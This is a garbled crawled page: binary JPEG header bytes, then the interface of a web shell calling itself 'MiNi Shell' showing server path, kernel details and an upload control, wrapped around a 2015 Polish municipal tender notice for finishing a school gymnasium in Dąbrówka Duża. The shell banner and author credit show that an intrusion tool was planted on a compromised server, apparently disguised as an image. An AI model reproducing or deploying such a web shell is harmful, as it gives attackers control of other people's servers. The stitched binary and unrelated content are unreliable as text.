JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150713/174298-N-2015.html

<p class="kh_header"><b>Brzeziny: Rozbudowa Szkoły Podstawowej w Dąbrówce Dużej o salę gimnastyczną.</b><br>
<b>Numer ogłoszenia: 174298 - 2015; data zamieszczenia: 13.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brzeziny , ul. Henryka Sienkiewicza 16, 96-060 Brzeziny, woj. łódzkie, tel. 046 8743699, faks 046 8743699.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminabrzeziny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Szkoły Podstawowej w Dąbrówce Dużej o salę gimnastyczną..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych niezbędnych do zakończenia zadania inwestycyjnego budowy sali gimnastycznej wraz z zapleczem przy Szkole Podstawowej zgodnie z dokumentacją projektową stanowiącą załącznik do SIWZ.   Roboty budowlane będące przedmiotem niniejszego postępowania stanowią prace niezbędne do zakończenia budowy i uzyskania pozwolenia na użytkowanie.                         
Obiekt zlokalizowany jest na działce 408 i 409  w miejscowości Dąbrówka Duża, Gmina Brzeziny. W trakcie realizacji zastał przygotowany projekt budowlany zamienny dotyczący budowy piętra nad częścią parterową (zaplecze sali sportowej) oraz dobudowy klatki schodowej w miejscu, gdzie pierwotnie projektowane było pomieszczenie trenera zgodnie z wytycznymi zawartymi w projekcie budowlanym.  
Do realizacji przewidziane są w szczególności następujące roboty budowlane:
branża budowlana:
wykonanie konstrukcji i pokrycia dachu, w tym:
wykonanie prac wykończeniowych pokrycia dachu budynku: izolacje cieplne i  przeciwdźwiękowe z płyt styropianowych, boazerie z listew drewnianych
montaż obróbek z tworzyw sztucznych na dachu- rury spustowe 
czyszczenie dźwigarów z drewna klejonego
wykonanie izolacji przeciwwilgociowych powłok bitumicznych poziomych konstrukcji z drewna klejonego
wykonanie stolarki, w tym:
montaż brakujących okien i ścianek działowych z luksferów
montaż drzwi wewnętrznych
montaż drabiny zewnętrznej 
montaż balustrad i pochwytów ze stali nierdzewnej
montaż wycieraczek systemowych zewnętrznych i wewnętrznych
wykonanie tynków i oblicowania, w tym:
montaż anemostatu kratek wentylacyjnych
montaż sufitów podwieszanych z płytami w włókien mineralnych 
dwukrotne malowanie  farbami emulsyjnymi powierzchni wewnętrznych
wykonanie podłoży i posadzek, w tym:
posadzek w pomieszczeniach z tworzyw sztucznych
wykonanie nawierzchni sportowej
wykonanie elewacji budynku, w tym:
zamocowanie listwy cokołowej 
wykonanie zewnętrznych okładzin cokołu budynku 
wykonanie  schodów zewnętrznych
wykonanie zewnętrznej okładziny tynkiem dekoracyjnym mozaikowym
wykonanie izolacji pionowej ścian fundamentowych
wykonanie nawierzchni z kostki brukowej 
wykonanie trawników dywanowych
branża  sanitarna
wykonanie podłączenia hydrantu zewnętrznego
uzbrojenie osadzonych zbiorników na nieczystości 
wykonanie instalacji c.o, w tym: 
montaż zaworów grzejnikowych oraz głowicy termostatycznej
montaż zespołu odcinającego do grzejników płytowych i garniturów przyłączeniowych do grzejników płytowych
montaż pompy typu STRATOS  PICO 25/1-4 130
montaż filtru siatkowego 
montaż manometrów z rurką i kurkiem odcinającym
montaż zaworu zwrotnego c.o.
płukanie instalacji c.o
wykonanie prób szczelności instalacji c.o.
wykonanie prób z dokonaniem regulacji instalacji centralnego ogrzewania
instalacja zasilania nagrzewnic, w tym:
płukanie instalacji z. n.
wykonanie prób szczelności instalacji z.n.
montaż zaworów odcinających, zwrotnych, równoważących typu ABN-QM GZ 
manometr z kurkiem odcinającym i rurką
montaż pompy typu STRATOS 30/1-6 CAN PN10
wykonanie instalacji wentylacji 
wykonanie instalacji wodociągowej, w tym:
montaż baterii umywalkowych i natryskowych wraz z zaworami 
montaż  stojącego zasobnika ciepła o poj. 1000 dm3
montaż zaworów polewaczkowego, kątowego, wykonanie izolacji rurociągu PE
dezynfekcja rurociągu
płukanie instalacji wodociągowej
próby szczelności instalacji wodociągowych
montaż hydrantu wewnętrznego
wykonanie instalacji kanalizacji  sanitarnej
montaż umywalek, zaworów napowietrzających, ustępów z płuczką typu kompakt i deską oraz brodzików natryskowych z kabinami
branża elektryczna
wykonanie instalacji elektrycznej, w tym:
wykonanie instalacji WZL
wykonanie rozdzielni RG
wykonanie instalacji oświetlenia i gniazd wtykowych
wykonanie instalacja oddymiania
wykonanie zasilania instalacji wentylacji
wyposażenie montowane:
dostarczenie i montaż kotary z mechanizmem przesuwnym dzielącej salę gimnastyczną
dostarczenie i montaż koszy montowanych do ścian szczytowych sali składane elektrycznie
dostarczenie i montaż koszy montowanych do ścian
dostarczenie i montaż drabinek szer. 90 cm, wysokość 250 cm
dostarczenie i montaż siatki i dwóch słupków do siatkówki
dostarczenie i montaż bramki z siatką do piłki ręcznej
dostarczenie i montaż gniazd do słupków
dostarczenie i montaż siatek piłko chwytów
dostarczenie i montaż elektronicznej tablicy wyników
dostarczenie i montaż trybun wewnętrznych składanych z siedzeniami typu ławka, barierą blokującą układ jezdny, wykonane na wymiar - liczba miejsc 36

Zakres prac ujęty jest w:
1) projektach budowlanych- będących załącznikami nr 10 do niniejszej specyfikacji;
A) projekt budowlany: zagospodarowanie terenu,
B) projekt budowlany: architektura,
C) projekt budowlany: konstrukcja,
D) projekt budowlany: drewno klejone- konstrukcja,
E) projekt budowlany: branża sanitarna- zewnętrznych instalacji wod- kan,
F) projekt budowlany: branża sanitarna- wewnętrznych instalacji wod- kan,
G) projekt budowlany: instalacja centralnego ogrzewania i zasilania nagrzewnic,
H) projekt budowlany: wentylacja,
I) projekt budowlany: branża elektryczna.
J) projekt budowlany zamienny: architektura,
K) projekt budowlany zamienny: konstrukcja,
L) projekt budowlany zamienny: konstrukcja dachu z drewna klejonego
Ł) projekt budowlany zamienny: branża sanitarna
M) projekt budowlany zamienny: branża elektryczna.
2) specyfikacjach technicznych wykonania i odbioru robót budowlanych będących załącznikami nr 11 do specyfikacji;
3) kosztorysie nakładczym robót niezbędnych do wykonania w celu uzyskania pozwolenia na użytkowanie- załącznik nr 9 do specyfikacji.

Prace powinny zostać wykonane zgodnie z w/w dokumentami, które zostały sporządzone przez Przedsiębiorstwo Projektowo- Budowlane EKOBUD s. c. Ewa i Remigiusz Owczarek z siedzibą Dmosin Drugi nr 89 B, 95-061 Dmosin

Zaleca się aby wykonawca przed złożeniem oferty sprawdził przedmiar robót                             z dokumentacją projektową, dokonał wizji lokalnej i dokładnie zapoznał się z zakresem zamówienia. W przypadku wątpliwości  powinien zwrócić się   o ich  wyjaśnienie.
Zamawiający dopuszcza, aby na etapie składania ofert Wykonawca zastosował rozwiązania wskazane dokumentacji technicznej lub równoważne, zgodnie 
z załącznikiem nr 10 do niniejszej specyfikacji.
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego zobowiązany jest wykazać, że oferowane przez niego dostawy i roboty budowlane spełniają wymagania określone przez Zamawiającego. Powinny jednak posiadać wszystkie wymagane atesty i certyfikaty oraz mieć parametry techniczno- użytkowe nie gorsze od tych, które są zawarte w dokumentacji. Zmiana jest możliwa w przypadku, gdy Wykonawca uzyska pisemną zgodę Zamawiającego i Projektanta.
Prace powinny być wykonane przez Wykonawcę wybranego w niniejszym postępowanie z materiałów i przy pomocy sprzętu Wykonawcy.
 Wykonawca w ramach kosztów własnych będzie zobowiązany do:
poniesienia kosztów zużytej energii, wody oraz innych opłat publiczno- prawnych związanych z wykonaniem inwestycji,
przygotowania zaplecza budowy,
usunięcia z budowy materiałów porozbiórkowych oraz innych odpadów zgodnie             z przepisami ustawy o odpadach,
po zakończeniu prac - do uporządkowania zajętego terenu i zaplecza technicznego.
 Wykonawca jest zobowiązany do:
powiadomienia właścicieli istniejących sieci o fakcie rozpoczęcia robót przed przystąpieniem do prac ziemnych;
wyznaczenia w terenie istniejące uzbrojenia i zabezpieczenia je  przed uszkodzeniem;
wykonywania prac w bezpośredniej bliskości istniejącego uzbrojenia ręcznie                     z zachowaniem szczególnej ostrożności i pod nadzorem pracownika  użytkownika sieci;
oznaczenia terenu prowadzonych prac zgodnie z instrukcją oznakowania robót;
wykonywania wszelkich prac zgodnie z zasadami BHP;
uzyskanie świadectwa charakterystyki energetycznej,
uzyskanie opinii o braku sprzeciwu ze strony organów wymienionych w art. 56 ustawy Prawo budowlane,
Zakres przedmiotowy przetargu obejmuje również obsługę geodezyjną polegającą na wytyczeniu oraz inwentaryzacji powykonawczej..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 22 000,00 zł (słownie: dwadzieścia dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenia                            o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenie                            o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych oraz gdy Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, wykonywał minimum dwie realizacje polegające na budowie nowych budynków lub remoncie kapitalnym istniejących już obiektów dla instytucji samorządowej lub rządowej 
o powierzchni użytkowej powyżej 800m2 lub kubaturze powyżej 7000m3 z wykazem, że oprócz robót budowlanych wykonywane były również roboty instalacyjne: elektryczne, centralnego ogrzewania i wod.- kan. - każda realizacja. Należy podać rodzaj robót, datę i miejsce oraz wartość wraz z załączonymi dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenie                            o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenie                            o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych oraz gdy Wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, a w szczególności będą odpowiedzialna za kierowanie robotami budowlanymi i osoby te będą posiadały wymagane uprawnienia budowlane w specjalności:
- konstrukcyjno- budowlanym- 1 osoba,
- elektrycznym- 1 osoba,
- instalacyjnym w specjalności wod.- kan., centralne ogrzewanie, wentylacja- 1 osoba.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony na podstawie podpisanego oświadczenia                               o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust.1 Ustawy Prawo Zamówień Publicznych oraz wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia                              w wysokości nie mniejszej niż 500 000,00 złotych (słownie: pięćset tysięcy złotych) aktualne na dzień złożenia oferty, wraz z oświadczeniem, że ubezpieczenie będzie kontynuowane przez cały okres realizacji umowy, zawartej w ramach udzielonego zamówienia publicznego oraz przedstawi informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia w wysokości nie mniejszej niż 500 000,00 zł (słownie: pięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - okres gwarancji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty 
na podstawie której dokonano wyboru wykonawcy w następujących przypadkach :
a)	w uzasadnionych przypadkach lub innych okolicznościach niezależnych od zamawiającego lub wykonawcy konieczna będzie zmiana terminu realizacji zamówienia, zamawiający 
na wniosek wykonawcy może przedłużyć termin realizacji zamówienia
b)	w innych uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy
c)	w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, 
a wynikły one w trakcie realizacji zamówienia
d)	w przypadku gdy zajdzie uzasadniona konieczność ograniczenia lub rezygnacji z części umownego zakresu robót. Zamawiający zastrzega sobie możliwość zmniejszenia wynagrodzenia umownego poprzez korektę wartości ryczałtowej przedmiotu umowy po cenach i stawkach wynikających z kosztorysu ofertowego Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminabrzeziny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Brzeziny, ul. Sienkiewicza 16A, 95-060 Brzeziny, pok.1.13;.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2015 godzina 09:30, miejsce: Urząd Gminy Brzeziny, ul. Sienkiewicza 16A, 95-060 Brzeziny, pok.1.08;.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com